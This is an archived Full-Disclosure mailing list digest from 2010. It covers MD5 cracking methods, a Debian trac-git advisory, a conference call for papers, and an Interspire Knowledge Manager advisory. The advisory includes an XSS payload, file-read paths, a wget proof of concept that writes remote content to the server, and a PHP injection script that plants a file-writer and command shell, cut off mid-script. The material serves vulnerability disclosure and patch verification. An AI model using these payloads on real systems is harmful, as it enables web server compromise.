lists.grok.org.uk] *On Behalf Of *Christian >> Sciberras >> *Sent:* 3. februar 2010 23:02 >> *To:* Valdis.Kletnieks at vt.edu >> *Cc:* full-disclosure at lists.grok.org.uk >> *Subject:* Re: [Full-disclosure] anybody know good service for cracking >> md5? >> >> Actually dictionary attacks seem to work quite well, especially for >> common users which typically use dictionary and/or well known passwords >> (such as the infamous "password"). >> Another idea which seems to be cropping in, is the use of hash tables with >> a list of known passwords rather then dictionary approach. >> Personally, the hash table one is quite successful, consider that it >> targets password groups rather than a load of wild guesses. >> >> Cheers. >> >> >> >> >> On Wed, Feb 3, 2010 at 10:26 PM, wrote: >> >>> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: >>> >>> > i find some sites which says that they can brute md5 hashes and WPA >>> dumps >>> > for 1 or 2 days. >>> >>> Given enough hardware and a specified md5 hash, one could at least >>> hypothetically find an input text that generated that hash. However, >>> that >>> may or may not be as useful as one thinks, as you wouldn't have control >>> over >>> what the text actually *was*. It would suck if you were trying to crack >>> a password, and got the one that was only 14 binary bytes long rather >>> than >>> the one that was 45 printable characters long. ;) >>> >>> Having said that, it would take one heck of a botnet to brute-force an >>> MD5 has >>> in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 >>> would >>> take on the order of 10**22 years. If all 140 million zombied computers >>> on the >>> internet were trying 1 billion keys per second, that drops it down to >>> 10**16 >>> years or so - or about 10,000 times the universe has been around already. >>> >>> I suspect they're actually doing a dictionary attack, which has a good >>> chance >>> of succeeding in a day or two. >>> >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/1d1bf9f4/attachment.html From sergio.pelissari at proteus-security.com Thu Feb 4 12:11:31 2010 From: sergio.pelissari at proteus-security.com (Sergio Pelissari) Date: Thu, 04 Feb 2010 10:11:31 -0200 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> Message-ID: <1265285491.6238.18.camel@primehaxor> You can try gpu brute-force, where the c/s is bigger than a normal quad-core processor. But you can't use wordlist because isnt make sense compared with c/s you try to break a hashe using something like incremental way on JTR. Actually BT4 comes with a md5_gpu_crack you need a VGA support with CUDA or the ATI technology ( i don't remember the name right now ) On Thu, 2010-02-04 at 12:59 +0100, Christian Sciberras wrote: > Uh, in the sense that they are finally becoming actually useful... > > > > > > On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull > wrote: > seems to be cropping in? > as far as know rainbow tables has been around for years... > > > > > > ______________________________________________________________ > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf > Of Christian Sciberras > Sent: 3. februar 2010 23:02 > To: Valdis.Kletnieks at vt.edu > Cc: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] anybody know good service for > cracking md5? > > > > > Actually dictionary attacks seem to work quite well, > especially for common users which typically use dictionary > and/or well known passwords (such as the infamous "password"). > Another idea which seems to be cropping in, is the use of hash > tables with a list of known passwords rather then dictionary > approach. > Personally, the hash table one is quite successful, consider > that it targets password groups rather than a load of wild > guesses. > > Cheers. > > > > > On Wed, Feb 3, 2010 at 10:26 PM, > wrote: > On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > > > i find some sites which says that they can brute md5 > hashes and WPA dumps > > for 1 or 2 days. > > > Given enough hardware and a specified md5 hash, one > could at least > hypothetically find an input text that generated that > hash. However, that > may or may not be as useful as one thinks, as you > wouldn't have control over > what the text actually *was*. It would suck if you > were trying to crack > a password, and got the one that was only 14 binary > bytes long rather than > the one that was 45 printable characters long. ;) > > Having said that, it would take one heck of a botnet > to brute-force an MD5 has > in 1 or 2 days. Given 1 billion keys/second, a true > brute force of MD5 would > take on the order of 10**22 years. If all 140 million > zombied computers on the > internet were trying 1 billion keys per second, that > drops it down to 10**16 > years or so - or about 10,000 times the universe has > been around already. > > I suspect they're actually doing a dictionary attack, > which has a good chance > of succeeding in a day or two. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From netinfinity.securitylab at gmail.com Thu Feb 4 12:47:42 2010 From: netinfinity.securitylab at gmail.com (netinfinity) Date: Thu, 4 Feb 2010 13:47:42 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <1265285491.6238.18.camel@primehaxor> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> <1265285491.6238.18.camel@primehaxor> Message-ID: Pyrit uses CUDA. On Thu, Feb 4, 2010 at 1:11 PM, Sergio Pelissari < sergio.pelissari at proteus-security.com> wrote: > You can try gpu brute-force, where the c/s is bigger than a normal > quad-core processor. > > But you can't use wordlist because isnt make sense compared with c/s you > try to break a hashe using something like incremental way on JTR. > > Actually BT4 comes with a md5_gpu_crack you need a VGA support with CUDA > or the ATI technology ( i don't remember the name right now ) > > On Thu, 2010-02-04 at 12:59 +0100, Christian Sciberras wrote: > > Uh, in the sense that they are finally becoming actually useful... > > > > > > > > > > > > On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull > > wrote: > > seems to be cropping in? > > as far as know rainbow tables has been around for years... > > > > > > > > > > > > ______________________________________________________________ > > From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf > > Of Christian Sciberras > > Sent: 3. februar 2010 23:02 > > To: Valdis.Kletnieks at vt.edu > > Cc: full-disclosure at lists.grok.org.uk > > Subject: Re: [Full-disclosure] anybody know good service for > > cracking md5? > > > > > > > > > > Actually dictionary attacks seem to work quite well, > > especially for common users which typically use dictionary > > and/or well known passwords (such as the infamous "password"). > > Another idea which seems to be cropping in, is the use of hash > > tables with a list of known passwords rather then dictionary > > approach. > > Personally, the hash table one is quite successful, consider > > that it targets password groups rather than a load of wild > > guesses. > > > > Cheers. > > > > > > > > > > On Wed, Feb 3, 2010 at 10:26 PM, > > wrote: > > On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > > > > > i find some sites which says that they can brute md5 > > hashes and WPA dumps > > > for 1 or 2 days. > > > > > > Given enough hardware and a specified md5 hash, one > > could at least > > hypothetically find an input text that generated that > > hash. However, that > > may or may not be as useful as one thinks, as you > > wouldn't have control over > > what the text actually *was*. It would suck if you > > were trying to crack > > a password, and got the one that was only 14 binary > > bytes long rather than > > the one that was 45 printable characters long. ;) > > > > Having said that, it would take one heck of a botnet > > to brute-force an MD5 has > > in 1 or 2 days. Given 1 billion keys/second, a true > > brute force of MD5 would > > take on the order of 10**22 years. If all 140 million > > zombied computers on the > > internet were trying 1 billion keys per second, that > > drops it down to 10**16 > > years or so - or about 10,000 times the universe has > > been around already. > > > > I suspect they're actually doing a dictionary attack, > > which has a good chance > > of succeeding in a day or two. > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://netinfinity-sec.blogspot.com http://www.ubuntu-pe.tk -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/e86e86a2/attachment.html From netinfinity.securitylab at gmail.com Thu Feb 4 12:50:45 2010 From: netinfinity.securitylab at gmail.com (netinfinity) Date: Thu, 4 Feb 2010 13:50:45 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? 6A9-4CD Message-ID: And why are my reply's spam??? On Thu, Feb 4, 2010 at 1:47 PM, netinfinity < netinfinity.securitylab at gmail.com> wrote: > Pyrit uses CUDA. > > > On Thu, Feb 4, 2010 at 1:11 PM, Sergio Pelissari < > sergio.pelissari at proteus-security.com> wrote: > >> You can try gpu brute-force, where the c/s is bigger than a normal >> quad-core processor. >> >> But you can't use wordlist because isnt make sense compared with c/s you >> try to break a hashe using something like incremental way on JTR. >> >> Actually BT4 comes with a md5_gpu_crack you need a VGA support with CUDA >> or the ATI technology ( i don't remember the name right now ) >> >> On Thu, 2010-02-04 at 12:59 +0100, Christian Sciberras wrote: >> > Uh, in the sense that they are finally becoming actually useful... >> > >> > >> > >> > >> > >> > On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull >> > wrote: >> > seems to be cropping in? >> > as far as know rainbow tables has been around for years... >> > >> > >> > >> > >> > >> > ______________________________________________________________ >> > From: full-disclosure-bounces at lists.grok.org.uk >> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf >> > Of Christian Sciberras >> > Sent: 3. februar 2010 23:02 >> > To: Valdis.Kletnieks at vt.edu >> > Cc: full-disclosure at lists.grok.org.uk >> > Subject: Re: [Full-disclosure] anybody know good service for >> > cracking md5? >> > >> > >> > >> > >> > Actually dictionary attacks seem to work quite well, >> > especially for common users which typically use dictionary >> > and/or well known passwords (such as the infamous "password"). >> > Another idea which seems to be cropping in, is the use of hash >> > tables with a list of known passwords rather then dictionary >> > approach. >> > Personally, the hash table one is quite successful, consider >> > that it targets password groups rather than a load of wild >> > guesses. >> > >> > Cheers. >> > >> > >> > >> > >> > On Wed, Feb 3, 2010 at 10:26 PM, >> > wrote: >> > On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: >> > >> > > i find some sites which says that they can brute md5 >> > hashes and WPA dumps >> > > for 1 or 2 days. >> > >> > >> > Given enough hardware and a specified md5 hash, one >> > could at least >> > hypothetically find an input text that generated that >> > hash. However, that >> > may or may not be as useful as one thinks, as you >> > wouldn't have control over >> > what the text actually *was*. It would suck if you >> > were trying to crack >> > a password, and got the one that was only 14 binary >> > bytes long rather than >> > the one that was 45 printable characters long. ;) >> > >> > Having said that, it would take one heck of a botnet >> > to brute-force an MD5 has >> > in 1 or 2 days. Given 1 billion keys/second, a true >> > brute force of MD5 would >> > take on the order of 10**22 years. If all 140 million >> > zombied computers on the >> > internet were trying 1 billion keys per second, that >> > drops it down to 10**16 >> > years or so - or about 10,000 times the universe has >> > been around already. >> > >> > I suspect they're actually doing a dictionary attack, >> > which has a good chance >> > of succeeding in a day or two. >> > >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: >> > http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> > >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > http://netinfinity-sec.blogspot.com > > http://www.ubuntu-pe.tk > -- http://netinfinity-sec.blogspot.com http://www.ubuntu-pe.tk -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/6efb1cd3/attachment.html From rc46fi at googlemail.com Thu Feb 4 13:56:45 2010 From: rc46fi at googlemail.com (Gregor Schneider) Date: Thu, 4 Feb 2010 14:56:45 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? 6A9-4CD In-Reply-To: References: Message-ID: 2010/2/4 netinfinity : > And why are my reply's spam??? - beacuse of your fullquotes - because you're hijacking a thread -- just because your paranoid, doesn't mean they're not after you... gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2 gpgp-key available @ http://pgpkeys.pca.dfn.de:11371 @ http://pgp.mit.edu:11371/ skype:rc46fi From rc46fi at googlemail.com Thu Feb 4 14:18:03 2010 From: rc46fi at googlemail.com (Gregor Schneider) Date: Thu, 4 Feb 2010 15:18:03 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? 6A9-4CD In-Reply-To: References: Message-ID: 2010/2/4 McGhee, Eddie : > "because your paranoid," > uhm, well, i believe being paranoid is a useful attitude when following this list.... gregor -- just because your paranoid, doesn't mean they're not after you... gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2 gpgp-key available @ http://pgpkeys.pca.dfn.de:11371 @ http://pgp.mit.edu:11371/ skype:rc46fi From uuf6429 at gmail.com Thu Feb 4 14:28:48 2010 From: uuf6429 at gmail.com (Christian Sciberras) Date: Thu, 4 Feb 2010 15:28:48 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? 6A9-4CD In-Reply-To: References: Message-ID: <3af3d47c1002040628s64864760s15e5ca6c4e008247@mail.gmail.com> Actually, that's an essential prerequisite. On Thu, Feb 4, 2010 at 3:18 PM, Gregor Schneider wrote: > 2010/2/4 McGhee, Eddie : > > "because your paranoid," > > > > uhm, well, i believe being paranoid is a useful attitude when > following this list.... > > gregor > -- > just because your paranoid, doesn't mean they're not after you... > gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2 > gpgp-key available > @ http://pgpkeys.pca.dfn.de:11371 > @ http://pgp.mit.edu:11371/ > skype:rc46fi > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/11266565/attachment.html From sf at debian.org Wed Feb 3 23:15:22 2010 From: sf at debian.org (Stefan Fritsch) Date: Wed, 03 Feb 2010 23:15:22 +0000 Subject: [Full-disclosure] [SECURITY] [DSA-1990-2] New trac-git package fixes regression Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1990-2 security at debian.org http://www.debian.org/security/ Stefan Fritsch February 04, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : trac-git Vulnerability : shell command injection Problem type : remote Debian-specific: yes CVE Id(s) : CVE-2010-0394 Debian Bug : 567039 The trac-git package released in DSA-1990-1 had a wrong dependency that could not be satisfied in Debian stable. This update corrects this problem. For reference, the original advisory text is provided below. Stefan Goebel discovered that the Debian version of trac-git, the Git add-on for the Trac issue tracking system, contains a flaw which enables attackers to execute code on the web server running trac-git by sending crafted HTTP queries. The old stable distribution (etch) does not contain a trac-git package. For the stable distribution (lenny), this problem has been fixed in version 0.0.20080710-3+lenny2. For the unstable distribution (sid) and the testing distribution (squeeze), this problem has been fixed in version 0.0.20090320-1. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny (stable) - ----------------------------------------- Source archives: http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710.orig.tar.gz Size/MD5 checksum: 28505 c8220478c501b7ab3e6df97cea6d2e26 http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny2.diff.gz Size/MD5 checksum: 4346 6ecb83bb5b43649c175f616a49a5fe58 http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny2.dsc Size/MD5 checksum: 1304 f417d111c73897256c84dcb034f01697 Architecture independent packages: http://security.debian.org/pool/updates/main/t/trac-git/trac-git_0.0.20080710-3+lenny2_all.deb Size/MD5 checksum: 17064 e5b15060f321ab660d497916668a00ee These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iD8DBQFLagLgbxelr8HyTqQRAhmuAKCtvT8T4L3SH6JDV+88+Mm6K11a6gCg2ISF maJVcUBX/UWbOfq5mG/wvKE= =BTcN -----END PGP SIGNATURE----- From Eddie.McGhee at ncr.com Wed Feb 3 16:48:20 2010 From: Eddie.McGhee at ncr.com (McGhee, Eddie) Date: Wed, 3 Feb 2010 11:48:20 -0500 Subject: [Full-disclosure] win7x64 Direct General In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B3293003365298@BE35.exg3.exghost.com> References: <9B9E7EA67E1B1342B2D25F3FD1B3293003365298@BE35.exg3.exghost.com> Message-ID: come again now son? ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: 03 February 2010 16:24 To: yuange; full-disclosure Subject: Re: [Full-disclosure] win7x64 Direct General Wow, that??s a searing indictment if I??ve ever heard one, I think. Larry Seltzer Contributing Editor, PC Magazine larry_seltzer at ziffdavis.com http://blogs.pcmag.com/securitywatch/ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of yuange Sent: Wednesday, February 03, 2010 11:16 AM To: full-disclosure Subject: [Full-disclosure] win7x64 Direct General win7x64 Direct General 2010-02-03 23:38 2010-02-03 23:38 ??????????????????????????????win7x64???????????????????????????????????????? Spend a day breaking the machine a good time to finally install win7x64, the result was universal pass to kill, I myself have had silently. microsoft???????????????????????????????????????????????????? microsoft does not pay to spend millions of years digging me, I'm sorry I really have the versatility of this procedure. http://translate.googleusercontent.com/translate_c?hl=zh-CN&sl=zh-CN&tl=en&u=http://hi.baidu.com/yuange1975/blog/item/022dec59443c4d212834f041.html&rurl=translate.google.cn&usg=ALkJrhg-C-arlz2AxJEkRSQznuAAoSqdNg#comment ________________________________ ????????????????????MSN?????? ?????????? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/17f655a1/attachment.html From philippe.langlois at gmail.com Wed Feb 3 18:26:11 2010 From: philippe.langlois at gmail.com (Philippe Langlois) Date: Thu, 4 Feb 2010 01:26:11 +0700 Subject: [Full-disclosure] =?windows-1252?q?Hackito_Ergo_Sum_2010_=96_Call?= =?windows-1252?q?_For_Paper_=96_HES2010_CFP?= Message-ID: Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP http://hackitoergosum.org Hackito Ergo Sum conference will be held from April 8th to 10th 2010 in Paris, France. It is part of the series of conference "Hacker Space Fest" taking place since 2008 in France and all over Europe. HES2010 will focus on hardcore computer security, insecurity, vulnerability analysis, reverse engineering, research and hacking. INTRO The goal of this conference is to promote security research, broaden public awareness and create an open forum so that communication between the researcher, the security industry, the experts and the public can happen. A recent decision of justice in France has convicted a security researcher for disclosing vulnerabilities and exploits. These laws (similar to the one in Germany), descending from USA's DMCA law, are orienting freedom of research and knowledge into a situation where "illegal knowledge" can happen, restricted to the only ones blessed by governmental silent approval and military. Scientific research and public information cannot be made into another monopoly of state, where "some" can study and publish and "some others" cannot. Such approach just show how misinformed some politics are and how little understanding they get of the struggle they are acting in. Not understanding that the best way to improve security is to attack it shows the lack of maturity of some stakeholder by being cut out of independent information sources. This is where our ethics and responsibility is to say "No, we have a right for free information and true independence in research", and this responsibility is the one of anybody, not just the responsibility of academically blessed scientists. This conference will try to take in account all voices in order to reach a balanced position regarding research and security, inviting businesses, governmental actors, researchers, professionals and general public to share concerns, approaches and interests during. During three days, research conferences, solutions presentations, panels and debates will aim at finding synthetic and balanced solutions to the current situation. CONTENT > Research Track: We are expecting submissions in english or french, english preferred. The format will be 45 mn presentation + 10mn Q&A. For the research track, preference will be given for offensive, innovative and highly technical proposals covering (but not restricted to) the topics below: Attacking Software * Vulnerability discovery (and automating it!) * Non-x86 exploitation * Fuzzing with SMT and its limits * New classes of software vulnerabilities and new methods to detect software bugs (source or binary based) * Reverse Engineering tools and techniques * Static analysis (source or binary, Lattices to blind analysis, new languages and targets strongly encouraged) * Unpacking * Current exploitation on Gnu/Linux WITH GRsecurity / SElinux / OpenWall / SSP and other current protection methods * Kernel land exploits (new architectures or remote only) * New advances in Attack frameworks and automation Attacking Infrastructures * Exotic Network Attacks * Telecom (from VoIP to SS7 to GSM & 3G RF hacks) * Financial and Banking institutions * SCADA and the industrial world, applied. * Governmental firewall and their limits (Australia, French's HADOPI, China, Iran, Danemark, Germany, ...) * Satellites, Military, Intelligence data collection backbones ("I hacked Echelon and I would like to share") * Non-IP (SNA, ISO, make us dream...) * Red-light and other public utilities control networks * M2M Attacking Hardware * Hardware reverse engineering (and exploitation + backdooring) * Femto-cell hacking (3G, LTE, ...) * Microchip grinding, opening, imaging and reverse engineering * BIOS and otherwise low-level exploitation vectors * Real-world SMM usage! We know it's vulnerable, now let's do something * WiFi drivers and System on Chip (SoC) overflow, exploitation and backdooring. * Gnu Radio hacking applied to new domains * Toll-booth and fast-lane payment systems Attacking Crypto * Practical crypto attacks from the hackers perspective (RCE, bruteforce, ...) * SAT-solver applied to cryptanalysis * Algorithm strength modeling and evaluation metrics * Hashing functions pre-image attacks * Crypto where you wouldn't think there is We highly encourage any other presentation topic that we may not even imagine. Required informations: * Presenter's name * Bio * Presentation Title * Description * Demo? * Needs: Internet? Others? * Company (name) or Independent? * Address * Phone * Email Send your submission to: hes2010-cfp __AT__ lists.hackitoergosum.org > Business & Society Track: Format: 20 minutes slots to present a tool, an innovative product, a solution (commercial, open source, free); a customer experience or open research domain; a society issue or a subject of public interest. Demos are mandatory for tool, product or solutions presentations. Pure-marketing presentation will be moderated (i.e. interrupted). Follow-up with private group can be arranged for in-depth demo or analysis. Submission needs to be sent to: hes2010-cfp __AT__ lists.hackitoergosum.org > Other interests If you want to organize a Capture The Flag, Reverse Engineering contest, Lockpicking contest or any other activity during the conference, you are most welcome. Please contact us at: hes2010- orga at lists.hackitoergosum.org DATES 2010-01-18 Call for Paper 2010-03-01 Submission Deadline 2010-04-08 Start of conference 2010-04-10 End of conference PROGRAMMING COMMITTEE The submissions will be reviewed by the following programming committee: * Sebastien Bourdeauducq (Milkymist, /tmp/lab, BEC) * Rodrigo Branco "BSDaemon" (Coseinc) * Jonathan Brossard (P1 Code Security, DNSlab) * Emmanuel Gadaix (TSTF) * Laurent Gaffi? (Stratsec) * Thomas Garnier (Microsoft) * The Grugq (PSP) * Dhillon Kannabhiran (HITB) * Kostya Kortchinsky (Immunity) * Itzik Kotler (Radware) * Philippe Langlois (P1 Telecom Security, PSP, TSTF, /tmp/lab) * Moxie Marlinspike (Institute for Disruptive Studies) * Karsten Nohl (deGate, Reflextor) * Nicolas Thill (OpenWRT, /tmp/lab) * Julien Tinnes (Google) * Nicolas Ruff (EADS, Security Labs) * Carlos Sarraute (CORE Security Technologies) * Matthieu Suiche (Sandman, win32dd) * Fyodor Yarochkin (TSTF, o0o.nu) FEES Business-ticket 120 EUR Public entrance 80 EUR Reduction for Students below 26 40 EUR Reduction for CVE publisher or exploit publisher in 2009/2010 40 EUR Entrance fees and sponsors fees will be used to fund international speakers travel costs. VOLUNTEERS Volunteers who sign up before 2010-03-01 get free access and will need to be present onsite two days before (2010-04-06) if no further arrangement is made with the organization. SPONSORS Sponsors are welcome to contact us to receive the Partnership Kit at: hes2010-orga __AT__ lists.hackitoergosum.org LOCATION Paris, France. CONTACT hes2010-orga __AT__ lists.hackitoergosum.org Hackito Ergo Sum 2010 conference - http://hackitoergosum.org Hacker Space Festival - http://www.hackerspace.net From coryamarsh at gmail.com Wed Feb 3 18:53:06 2010 From: coryamarsh at gmail.com (Cory Marsh) Date: Wed, 3 Feb 2010 11:53:06 -0700 Subject: [Full-disclosure] Interspire Knowledge Manager multiple remote code execution vulnerabilities Message-ID: <9ab719961002031053w7d4d0f5ch9bfff97c0c3fc70e@mail.gmail.com> #!/bin/sh # # - Interspire Knowledge Manager - # # ====================================================================== # Table of Contents # # Affected Software....................................................1 # Severity.............................................................2 # Vendor's Description of Software.....................................3 # Description of Vulnerability.........................................4 # Solution.............................................................5 # Time Table...........................................................6 # Credits..............................................................7 # Sample Exploit.....................................................8 # # ====================================================================== # 1) Affected Software # # * Interspire Knowledgebase Manager <= 5.1.3 # # ====================================================================== # 2) Severity # # Rating: Critical # Impact: Web server compromise, remote code injection # Where: Remote # # ====================================================================== # 3) Vendor's Description of Software # # "Knowledge Management Software to Locate, Capture and Share Information With Your Team. # Interspire Knowledge Manager allows you to share information from your website or Intranet with # an enterprise-grade knowledge base, reducing customer support, improving staff productivity and # eliminating time wasted searching for information across disparate systems such as shared # folders and paper documents. # Share knowledge easily & securely # Already in use by over 2,000 small businesses, universities, non-profits and enterprise organizations" # # Product Link: # http://www.interspire.com/knowledgemanager/ # # ====================================================================== # 4) Description of Vulnerability # # Multiple vulnerabilities exist in the software with a range of impact. # Known vulnerabilities include: # # Information Disclosure: # Information disclosure of the server's $_SERVER['DOCUMENT_ROOT'] # admin/de/dialog/media_manager.php: view source, roots["dRoot"] = # This can be used by an attacker to determine the server's root path from a relative path, # or from a root path to a web accessible path. # - no fix available. # # Cross Site Scripting # many XSS holes exist, here is a sample transient XSS hole, many more exist: # admin/de/colormenu.php?sp=f";alert('xss');a=" # - fix: no fix available # # SQL Injection: # Nearly every query is vulnerable to SQL injection with PHP magic quotes # turned off. Input validation fails at many levels, so some SQL injection # may still be likely with magic quotes on. # - fix: turn on magic quotes # # Remote File Read: # The application blindly accepts user data, unfiltered and reads files from # the file system. # admin/de/dialog/file_manager.php?p=/file/to/read&w=1 # - fix: vendor is recommending purchasing version 5.1.3 # # Remote File Write: # The software has a "feature" that allows overwriting $_SESSION variables # with $_GET variables. Parts of the software that assume these variables # are secure, can then be exploited to write any file to the system by an # unauthenticated user, including PHP code. # example POC code: # # #!/bin/sh # echo "$0 # example: $0 http://target.com/knowledge_base ../../../ file.php http://source # if kb is installed at knowledge_base, then the file: file.php will be # created in the base application directory from the content at http://source # " # sessionUrl=$1'/admin/de/dialog/file_manager.php' # uploadUrl=$1'/admin/de/dialog/callback.snipshot.php' # wget -O r1 --save-cookies tmp.cookies --keep-session-cookies "$sessionUrl?userdocroot=$2&imgDir=&obj=1" # echo "session created, setting file name $2$3" # wget -O r2 --keep-session-cookies --load-cookies tmp.cookies "$uploadUrl?action=step1&source_image=name&save_file_as=$3" # echo "upload content from: $4 ..." # wget -O r3 --keep-session-cookies --load-cookies tmp.cookies "$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4" # echo "file created test access to the script at: $1/admin/de/dialog/$2$3"; # # - fix: vendor is recommending purchasing version 5.1.3 # # PHP code Injection: # The software has a feature that connects to Interspire to find the latest # version of the software. This is then cached in a PHP file. The version # number is taken from a get variable and written directly into a PHP file. # This allows anyone with web access to the software to upload code # and execute it remotely. # - fix: vendor has said that a fix will be available for purchase during the next release cycle. # An alternate patch is available in this advisory. # # ====================================================================== # 5) Solution # # Remote file reads, writes and code injection can be fixed by purchasing version 5.1.3 and # applying the included patch to the PHP code. The other vulnerabilities are hopefully addressed # in the next release cycle. # # file to patch: admin/remote.php # # ====================================================================== # 6) Time Table # # 1/15/2009 - Vendor notified. # 2/02/2010 - Vendor responded that vulnerability would be addressed in next software version and # no security patch would be made available to customers. # 2/03/2010 - Non-vendor patch created to solve remote code injection problem. # ====================================================================== # 7) Credits Cory Marsh # # ====================================================================== # 8) context sensitive patch diff admin/remote.php: # *** remote.orig.php 2010-02-03 08:44:19.116062114 -0000 --- remote.php 2010-02-03 08:49:22.086078275 -0000 *************** *** 28,34 **** if (isset($_REQUEST['type'])) { switch ($_REQUEST['type']) { case 'saveVersion': ! if(!isset($_REQUEST['v'])) { exit; } --- 28,34 ---- if (isset($_REQUEST['type'])) { switch ($_REQUEST['type']) { case 'saveVersion': ! if(!isset($_REQUEST['v']) || !preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) { exit; } # # ====================================================================== # 8) Sample exploit, use this to verify the patch. # # This POC example can be used to verify vulnerable software, and then verify that the patch # worked correctly. This script will modify the admin/tmp/LatestVersion.php script so that # in addition to defining the latest software version, it will also write a file to the filesystem passed # as a POST paramater "f", with the contents of POST parameter "u". It will then use this # LatestVersion.php script to create a new file /admin/incadd_set.php that echo's out the GET # parameter "cmd". After applying the supplied patch, this exploit script should no longer work # echo "usage: $0 example: $0 http://www.remotehost/help "; vulnerable="$1/admin/remote.php" compromised="$1/admin/tmp/LatestVersion.php"; echo "type=saveVersion&v=5.1.3','lastCheck'=>time());if(isset(\$_POST['f']))file_put_contents(\$_POST['f'],stripslashes(\$_POST['u']));\$a=array('" > injection.txt echo "f=../incadd_set.php&u=
 code.txt
